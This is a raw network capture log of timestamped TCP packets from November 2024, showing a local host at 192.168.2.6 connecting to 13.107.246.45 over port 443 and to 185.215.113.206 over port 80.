                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.514028072 CET49739443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.514048100 CET4434973913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.514724970 CET49739443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.514730930 CET4434973913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.528870106 CET4434973813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.529242039 CET49738443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.529268026 CET4434973813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.529860020 CET49738443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.529869080 CET4434973813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.534984112 CET4434974013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.536134958 CET49740443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.536155939 CET4434974013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.536561012 CET49740443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.536566973 CET4434974013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.596733093 CET4434973713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.596781969 CET4434973713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.596846104 CET49737443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.597142935 CET49737443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.597166061 CET4434973713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.597177029 CET49737443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.597186089 CET4434973713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.601150990 CET49743443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.601188898 CET4434974313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.601267099 CET49743443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.601427078 CET49743443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.601438999 CET4434974313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.613023996 CET4434973913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.613156080 CET4434973913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.613219023 CET49739443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.613352060 CET49739443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.613385916 CET4434973913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.613396883 CET49739443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.613403082 CET4434973913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.616245031 CET49744443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.616307974 CET4434974413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.616410017 CET49744443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.616611004 CET49744443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.616631985 CET4434974413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.641408920 CET4434974113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.641450882 CET4434974113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.641508102 CET49741443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.641673088 CET49741443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.641689062 CET4434974113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.641701937 CET49741443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.641707897 CET4434974113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.644088030 CET49745443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.644114017 CET4434974513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.644298077 CET49745443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.644438982 CET49745443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.644454002 CET4434974513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.645426989 CET4434973813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.645567894 CET4434973813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.645684004 CET49738443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.645710945 CET49738443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.645720959 CET4434973813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.645730019 CET49738443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.645735979 CET4434973813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.647738934 CET49746443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.647762060 CET4434974613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.647819042 CET49746443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.647913933 CET49746443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.647931099 CET4434974613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.651518106 CET4434974013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.651659012 CET4434974013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.651818037 CET49740443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.651854038 CET49740443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.651874065 CET4434974013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.651887894 CET49740443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.651896000 CET4434974013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.653817892 CET49747443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.653841972 CET4434974713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.653901100 CET49747443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.654058933 CET49747443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.654067993 CET4434974713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.739574909 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.739659071 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.743864059 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.750319004 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.974553108 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.975703955 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.976046085 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.980825901 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.195415974 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.195496082 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.195749044 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.195820093 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.197906017 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.202717066 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.263523102 CET4434974313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.264292002 CET49743443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.264317036 CET4434974313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.264823914 CET49743443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.264830112 CET4434974313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.265419960 CET4434974413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.265933037 CET49744443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.265964031 CET4434974413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.266567945 CET49744443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.266573906 CET4434974413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.280853987 CET4434974513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.281524897 CET49745443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.281542063 CET4434974513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.282032967 CET49745443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.282038927 CET4434974513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.289608002 CET4434974613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.290147066 CET49746443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.290175915 CET4434974613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.290779114 CET49746443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.290792942 CET4434974613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.344799042 CET4434974713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.345549107 CET49747443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.345567942 CET4434974713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.346244097 CET49747443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.346255064 CET4434974713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.365235090 CET4434974313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.365376949 CET4434974313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.365452051 CET49743443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.365627050 CET49743443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.365642071 CET4434974313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.365655899 CET49743443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.365660906 CET4434974313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.369692087 CET49748443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.369713068 CET4434974813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.369807005 CET49748443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.370105982 CET49748443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.370119095 CET4434974813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.371491909 CET4434974413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.371627092 CET4434974413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.371716976 CET49744443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.371789932 CET49744443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.371812105 CET4434974413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.371825933 CET49744443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.371831894 CET4434974413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.374238968 CET49749443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.374272108 CET4434974913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.374344110 CET49749443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.374454021 CET49749443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.374469042 CET4434974913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.390139103 CET4434974513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.390213966 CET4434974513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.390481949 CET49745443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.390530109 CET49745443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.390544891 CET4434974513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.390553951 CET49745443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.390561104 CET4434974513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.393393993 CET49750443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.393404007 CET4434975013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.393479109 CET49750443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.393610001 CET49750443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.393620014 CET4434975013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.419600964 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.419621944 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.419637918 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.419653893 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.419670105 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.419684887 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.419702053 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.419718981 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.419795036 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.425723076 CET4434974613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.425806046 CET4434974613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.425901890 CET49746443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.427737951 CET49746443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.427753925 CET4434974613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.427763939 CET49746443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.427767992 CET4434974613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.431828976 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.432864904 CET49751443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.432887077 CET4434975113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.432969093 CET49751443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.433237076 CET49751443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.433249950 CET4434975113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.436765909 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.447540998 CET4434974713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.447696924 CET4434974713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.447818041 CET49747443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.448115110 CET49747443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.448124886 CET4434974713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.448137045 CET49747443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.448141098 CET4434974713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.451562881 CET49752443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.451625109 CET4434975213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.451776028 CET49752443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.451951981 CET49752443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.451968908 CET4434975213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.650948048 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.651009083 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.675273895 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.675422907 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.682813883 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.682827950 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.682955980 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.682969093 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.683089972 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.683104992 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.683267117 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.966537952 CET4434975013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.001591921 CET49750443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.001610994 CET4434975013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.005970001 CET49750443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.005974054 CET4434975013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.029017925 CET4434974813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.029632092 CET49748443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.029644966 CET4434974813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.030270100 CET49748443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.030275106 CET4434974813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.050790071 CET4434974913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.054377079 CET49749443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.054395914 CET4434974913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.054840088 CET49749443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.054847002 CET4434974913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.103358030 CET4434975213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.103889942 CET49752443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.103907108 CET4434975213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.104363918 CET49752443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.104371071 CET4434975213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.108556986 CET4434975113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.108578920 CET4434975013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.108634949 CET4434975013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.108695030 CET49750443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.108845949 CET49751443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.108855963 CET4434975113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.109194994 CET49751443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.109200001 CET4434975113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.109373093 CET49750443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.109385967 CET4434975013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.109405994 CET49750443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.109411955 CET4434975013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.112339973 CET49753443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.112370014 CET4434975313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.112443924 CET49753443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.112559080 CET49753443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.112571955 CET4434975313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.132920980 CET4434974813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.133140087 CET4434974813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.133243084 CET49748443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.133243084 CET49748443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.136002064 CET49754443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.136003017 CET49748443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.136009932 CET4434974813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.136039972 CET4434975413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.136113882 CET49754443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.136234045 CET49754443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.136249065 CET4434975413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.160264015 CET4434974913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.160397053 CET4434974913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.160501003 CET49749443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.179805040 CET49749443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.179819107 CET4434974913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.179842949 CET49749443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.179848909 CET4434974913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.184072971 CET49755443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.184087992 CET4434975513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.184159040 CET49755443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.184357882 CET49755443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.184367895 CET4434975513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.210612059 CET4434975213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.210669994 CET4434975213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.210819006 CET49752443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.216136932 CET4434975113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.216202974 CET4434975113.107.246.45192.168.2.6
